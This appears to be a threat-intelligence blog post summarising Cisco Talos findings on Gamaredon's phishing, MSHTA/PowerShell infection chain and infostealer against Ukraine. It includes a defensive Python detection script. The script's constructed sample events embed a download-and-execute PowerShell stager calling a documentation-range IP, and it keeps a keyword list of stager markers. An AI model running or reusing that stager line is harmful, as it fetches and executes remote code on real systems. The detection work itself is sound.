Cisco Talos researchers recently reported on new activity by Armageddon, a Russia-nexus threat actor group. The group is using a new infostealer to target entities in Ukraine.
- Armageddon is a Russia-nexus threat actor group with a history of targeting Ukraine.
- Armageddon uses phishing emails with malicious documents as bait.
- The recent campaign uses a new infostealer not previously observed in the wild.
- The infostealer is capable of stealing files from the victim machine and any connected removable drives.
According to Cisco Talos, Armageddon (Gamaredon) is targeting entities in Ukraine with RAR archives distributing malicious LNK files. The campaign has been active since at least August 2022.
The infection chain begins with phishing emails using lures related to the Russia-Ukraine conflict. The emails deliver malicious Office documents with remote templates containing malicious VBS macros. These macros download and open RAR compressed files containing LNK files.
The LNK files execute MSHTA.EXE to download and parse a remote XML file and execute a PowerShell script. This PowerShell script decodes and executes a second PowerShell script, an instrumentor used to collect victim data and report it to the C2. Notably, the C2 server only accepts connections from IP addresses allocated to Ukraine’s address space, so the follow-on stages cannot be fetched from outside that range. The instrumentor also gives the C2 the ability to send a PowerShell command or an encrypted VBScript to be executed: it has a function that decodes the encrypted response from the C2 and executes it as a VBScript object.
The C2 can send multiple payloads, including a PowerShell script to maintain persistence and an infostealer. Cisco Talos notes the infostealer appears to be a new tool not used in previous campaigns. The infostealer exfiltrates files with the following extensions from the victim machine: .doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z and .mdb. It is capable of stealing files from the victim machine and any connected removable drives.
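As an added hunting example (not Cisco Talos or PolySwarm tooling, and not code from the campaign), the following Python triages constructed Sysmon-style process-creation records for the MSHTA to PowerShell hand-off described above: it flags mshta.exe pulling remote content, PowerShell spawned by mshta.exe, and decodes any -EncodedCommand payload to look for download-and-execute stagers. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the hosts, paths and payload are constructed, and the IP address is from the 203.0.113.0/24 documentation range.

```python
"""Triage constructed Sysmon-style process-creation events for an
mshta.exe -> PowerShell stager chain. Added example, not the campaign's
code or any vendor's tooling; all sample data below is constructed."""
import base64

# Matches an http(s) URL anywhere in a command line (loose on purpose).
import re
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Phrases in a decoded script that suggest a download-and-execute stager.
STAGER_MARKERS = (
    "downloadstring", "downloadfile", "net.webclient",
    "invoke-webrequest", "invoke-expression", "iex",
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE text behind -EncodedCommand, or None.

    powershell.exe accepts any unambiguous prefix of the switch
    (-e, -ec, -enc, -EncodedCommand ...), so match by prefix rather
    than by a fixed spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and flag and "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but payload is not valid
    return None


def triage(event: dict) -> list:
    """Return the names of the detections that fire for one event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_content")  # LOLBin fetching remote HTA/XML
    if image in ("powershell.exe", "pwsh.exe"):
        if parent == "mshta.exe":
            hits.append("powershell_spawned_by_mshta")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
            if any(m in decoded.lower() for m in STAGER_MARKERS):
                hits.append("powershell_download_and_execute")
    return hits


def sample_events() -> list:
    """Constructed Sysmon Event ID 1 style records (not real telemetry)."""
    stager = ("IEX (New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.10/stage2')")
    encoded = base64.b64encode(stager.encode("utf-16-le")).decode("ascii")
    return [
        {"Image": r"C:\Windows\System32\mshta.exe",
         "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": "mshta.exe http://203.0.113.10/update.xml"},
        {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "ParentImage": r"C:\Windows\System32\mshta.exe",
         "CommandLine": f"powershell.exe -NoP -W Hidden -enc {encoded}"},
        {"Image": r"C:\Windows\System32\notepad.exe",
         "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
        {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "ParentImage": r"C:\Windows\System32\cmd.exe",
         "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
    ]


def hunt(events: list) -> list:
    """Pair each event index with its detections, skipping clean events."""
    return [(i, triage(e)) for i, e in enumerate(events) if triage(e)]


if __name__ == "__main__":
    for idx, names in hunt(sample_events()):
        print(idx, names)
```

Because the C2 refuses connections from outside Ukraine's address space, an analyst outside that range usually cannot pull the follow-on scripts; decoding whatever was already executed on the endpoint, as above, is often the only way to recover the stager's intent.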
Who is Armageddon?
Armageddon, also known as Gamaredon, Shuckworm, or Primitive Bear, is one of the most active APT groups targeting Ukrainian assets. The group’s past campaigns have involved espionage activity aligned with Russian interests. In November 2021, the Security Service of Ukraine (SSU) publicly linked five Russian Federal Security Service (FSB) officers based in Crimea to the group. A report by the SSU stated Armageddon has been active since at least 2014 and has engaged in multiple cyber-espionage campaigns from 2017 to 2021. The SSU report notes Armageddon does not typically use sophisticated TTPs and does not seem to emphasize OPSEC. Some TTPs used by Armageddon include spearphishing, PowerShell, UltraVNC, FileStealer, EvilGnome, and Pterodo. We published a blog post on Pterodo earlier this year.
PolySwarm has multiple samples associated with this campaign.
You can use the following CLI command to search for all Armageddon samples in our portal:
$ polyswarm link list -f Gameredon
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.